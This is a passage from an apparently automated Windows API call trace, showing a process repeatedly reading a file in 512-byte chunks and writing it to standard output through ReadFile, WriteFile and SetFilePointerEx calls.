lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.887] GetFileType (hFile=0x50) returned 0x1 [0205.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.887] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.887] GetFileType (hFile=0x50) returned 0x1 [0205.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.887] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.887] GetFileType (hFile=0x50) returned 0x1 [0205.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.887] WriteFile (in: hFile=0x50, 
lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.887] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.887] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.887] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] GetFileType (hFile=0x50) returned 0x1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] GetFileType (hFile=0x50) returned 0x1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] GetFileType (hFile=0x50) returned 0x1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] GetFileType (hFile=0x50) returned 0x1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.888] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0205.888] GetFileType (hFile=0x50) returned 0x1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] GetFileType (hFile=0x50) returned 0x1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] GetFileType (hFile=0x50) returned 0x1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.889] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.889] GetFileType (hFile=0x50) returned 0x1 [0205.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.889] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.889] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.889] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.889] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, 
lpOverlapped=0x0) returned 1 [0205.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.889] GetFileType (hFile=0x50) returned 0x1 [0205.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.889] GetFileType (hFile=0x50) returned 0x1 [0205.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.889] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.889] GetFileType (hFile=0x50) returned 0x1 [0205.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.889] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.889] GetFileType (hFile=0x50) returned 0x1 [0205.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.889] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.890] GetFileType (hFile=0x50) returned 0x1 [0205.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.890] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.890] GetFileType (hFile=0x50) returned 0x1 [0205.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.890] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 
| out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.890] GetFileType (hFile=0x50) returned 0x1 [0205.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.890] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.890] GetFileType (hFile=0x50) returned 0x1 [0205.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.890] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.890] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.890] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.890] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.890] GetFileType (hFile=0x50) returned 0x1 [0205.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.890] GetFileType (hFile=0x50) returned 0x1 [0205.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.890] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.891] GetFileType (hFile=0x50) returned 0x1 [0205.891] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0205.891] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.891] GetFileType (hFile=0x50) returned 0x1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.891] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.891] GetFileType (hFile=0x50) returned 0x1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.891] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.891] GetFileType (hFile=0x50) returned 0x1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.891] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.891] GetFileType (hFile=0x50) returned 0x1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.891] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.891] GetFileType (hFile=0x50) returned 0x1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 
[0205.892] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.892] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.892] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.892] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.892] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.892] GetFileType (hFile=0x50) returned 0x1 [0205.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.892] GetFileType (hFile=0x50) returned 0x1 [0205.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.892] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.892] GetFileType (hFile=0x50) returned 0x1 [0205.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.892] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.892] GetFileType (hFile=0x50) returned 0x1 [0205.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.892] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 
[0205.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.892] GetFileType (hFile=0x50) returned 0x1 [0205.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.892] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.893] GetFileType (hFile=0x50) returned 0x1 [0205.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.893] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.893] GetFileType (hFile=0x50) returned 0x1 [0205.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.893] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.893] GetFileType (hFile=0x50) returned 0x1 [0205.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.893] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.893] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.893] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.893] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.893] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, 
lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.893] GetFileType (hFile=0x50) returned 0x1 [0205.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.893] GetFileType (hFile=0x50) returned 0x1 [0205.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.893] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.894] GetFileType (hFile=0x50) returned 0x1 [0205.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.894] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.894] GetFileType (hFile=0x50) returned 0x1 [0205.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.894] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.894] GetFileType (hFile=0x50) returned 0x1 [0205.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.894] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.894] GetFileType (hFile=0x50) returned 0x1 [0205.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.894] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.894] GetFileType (hFile=0x50) returned 0x1 [0205.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.894] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.895] GetFileType (hFile=0x50) returned 0x1 [0205.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.895] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.895] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.895] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.895] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.895] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.895] GetFileType (hFile=0x50) returned 0x1 [0205.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.895] GetFileType (hFile=0x50) returned 0x1 [0205.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.895] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.895] GetFileType 
(hFile=0x50) returned 0x1 [0205.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.895] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.895] GetFileType (hFile=0x50) returned 0x1 [0205.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.895] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.895] GetFileType (hFile=0x50) returned 0x1 [0205.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.895] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.896] GetFileType (hFile=0x50) returned 0x1 [0205.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.896] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.896] GetFileType (hFile=0x50) returned 0x1 [0205.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.896] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.896] GetFileType (hFile=0x50) returned 0x1 [0205.896] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0205.896] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.896] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.896] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.896] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.896] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.896] GetFileType (hFile=0x50) returned 0x1 [0205.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.896] GetFileType (hFile=0x50) returned 0x1 [0205.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.896] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.897] GetFileType (hFile=0x50) returned 0x1 [0205.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.897] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.897] GetFileType (hFile=0x50) returned 0x1 [0205.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.897] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, 
lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.897] GetFileType (hFile=0x50) returned 0x1 [0205.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.897] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.897] GetFileType (hFile=0x50) returned 0x1 [0205.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.897] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.897] GetFileType (hFile=0x50) returned 0x1 [0205.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.897] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.897] GetFileType (hFile=0x50) returned 0x1 [0205.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.898] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.898] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.898] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, 